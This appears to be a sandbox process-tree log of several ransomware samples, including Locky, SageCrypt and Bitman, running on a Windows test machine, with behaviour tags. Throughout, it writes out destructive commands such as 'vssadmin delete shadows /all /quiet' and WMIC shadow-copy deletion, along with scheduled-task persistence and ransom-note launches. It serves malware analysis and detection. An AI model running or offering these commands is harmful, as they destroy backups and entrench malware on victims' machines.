C:\Windows\hbuuvsjbfrbv.exeC:\Windows\hbuuvsjbfrbv.exe4⤵
- DcRat
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:14112 -
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive5⤵PID:28232
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT5⤵
- Opens file in notepad (likely ransom note)
PID:36336
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM5⤵PID:2956
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2956 CREDAT:275457 /prefetch:26⤵PID:45180
-
-
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /noin teractive5⤵PID:27216
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\HBUUVS~1.EXE5⤵PID:53820
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR68B3~1.EXE4⤵PID:14440
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exeTrojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1168 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exeTrojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5848 -
C:\Windows\lpdcqkacfhfo.exeC:\Windows\lpdcqkacfhfo.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5708 -
C:\Windows\lpdcqkacfhfo.exeC:\Windows\lpdcqkacfhfo.exe6⤵
- Adds Run key to start application
- Drops file in Program Files directory
- System policy modification
PID:38548 -
C:\Users\Admin\Documents\sqtsi.exeC:\Users\Admin\Documents\sqtsi.exe7⤵PID:41736
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet8⤵
- Interacts with shadow copies
PID:41440
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT7⤵
- Opens file in notepad (likely ransom note)
PID:16920
-
-
C:\Users\Admin\Documents\pyvgb.exeC:\Users\Admin\Documents\pyvgb.exe7⤵PID:54960
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet8⤵
- Interacts with shadow copies
PID:55848
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00288\TR7DE9~1.EXE5⤵PID:3624
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exeTrojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2052 -
C:\Users\Admin\AppData\Local\CTHelpers.exe"C:\Users\Admin\AppData\Local\CTHelpers.exe" /d "C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:16008
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exeTrojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2428 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exeTrojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe4⤵
- Executes dropped EXE
PID:4884
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exeTrojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2256
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exeTrojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2188
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exeTrojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2168 -
C:\Windows\syswow64\svchost.exeC:\Windows\syswow64\svchost.exe4⤵
- Suspicious use of SetThreadContext
PID:36852 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"5⤵
- DcRat
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:36888
-
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exeTrojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2444 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\DesktopOSIRIS.htm4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:13716 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:13716 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:47940
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys9BA3.tmp"4⤵PID:12592
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exeTrojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:672 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe" g4⤵
- Executes dropped EXE
PID:41368
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F4⤵
- DcRat
- Luminosity
- System Location Discovery: System Language Discovery
PID:41020
-
-
C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"4⤵
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies data under HKEY_USERS
- Modifies registry class
PID:36972 -
C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:36940
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet5⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:54968
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:35168
-
-
C:\Windows\SysWOW64\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:11072
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"5⤵
- Modifies Internet Explorer settings
PID:36244
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"5⤵PID:11200
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"4⤵PID:5224
-
-
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exeTrojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2164 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:41584 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5512 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g6⤵
- Executes dropped EXE
PID:3672 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g7⤵
- Executes dropped EXE
PID:4004 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g8⤵
- Executes dropped EXE
PID:26924 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:56308 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g10⤵PID:10428
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g11⤵
- System Location Discovery: System Language Discovery
PID:11252 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g12⤵
- System Location Discovery: System Language Discovery
PID:10668 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g13⤵PID:46748
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g14⤵PID:15080
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g15⤵PID:41796
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g16⤵PID:14560
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g17⤵
- System Location Discovery: System Language Discovery
PID:32548 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g18⤵PID:3992
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g19⤵PID:45104
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g20⤵PID:27932
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g21⤵
- System Location Discovery: System Language Discovery
PID:20900 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g22⤵
- System Location Discovery: System Language Discovery
PID:3136 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g23⤵PID:53312
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g24⤵
- System Location Discovery: System Language Discovery
PID:12904 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g25⤵
- System Location Discovery: System Language Discovery
PID:11844 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g26⤵
- System Location Discovery: System Language Discovery
PID:50960 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g27⤵PID:48228
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g28⤵
- System Location Discovery: System Language Discovery
PID:40200 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g29⤵PID:35404
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g30⤵PID:38080
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g31⤵
- System Location Discovery: System Language Discovery
PID:9796 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g32⤵
- System Location Discovery: System Language Discovery
PID:7780 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g33⤵PID:34496
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g34⤵PID:33552
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g35⤵PID:30924
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g36⤵
- System Location Discovery: System Language Discovery
PID:32668 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g37⤵
- System Location Discovery: System Language Discovery
PID:25632 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g38⤵
- System Location Discovery: System Language Discovery
PID:24952 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g39⤵
- System Location Discovery: System Language Discovery
PID:33904 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g40⤵
- System Location Discovery: System Language Discovery
PID:18076 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g41⤵PID:6520
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g42⤵
- System Location Discovery: System Language Discovery
PID:43092 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g43⤵PID:3676
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g44⤵PID:26992
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g45⤵PID:18624
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g46⤵
- System Location Discovery: System Language Discovery
PID:52492 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g47⤵PID:53408
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g48⤵PID:12816
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g49⤵
- System Location Discovery: System Language Discovery
PID:51904 -
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g50⤵PID:47584
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g51⤵PID:48964
-
C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe"C:\Users\Admin\Desktop\00288\Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe" g52⤵PID:5424
-
